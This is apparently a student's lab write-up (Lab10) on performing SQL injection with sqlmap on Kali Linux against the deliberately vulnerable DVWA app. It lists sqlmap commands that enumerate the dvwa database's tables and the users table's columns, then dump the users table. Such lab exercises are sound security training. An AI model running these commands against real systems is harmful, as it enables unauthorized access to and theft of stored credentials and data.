20bce1965 Lab10
20bce1965 Lab10
Question:
Perform SQL Injection using SQLMap on Kali Linux
Solution:
Use command ‘sqlmap -u “<copied link>” -D dvwa --tables’ to view tables inside
the DVWA Database. Press ‘y’ to indicate ‘Yes’ for follow-up questions.
Use command ‘sqlmap -u “<copied link>” -D dvwa -T users --columns’ to view
columns inside the users table. Press ‘y’ to indicate ‘Yes’ for follow-up questions.
Use command ‘sqlmap -u “<copied link>” -D dvwa -T users --dump’ to view all
data inside the users table. Press ‘y’ to indicate ‘Yes’ for follow-up questions.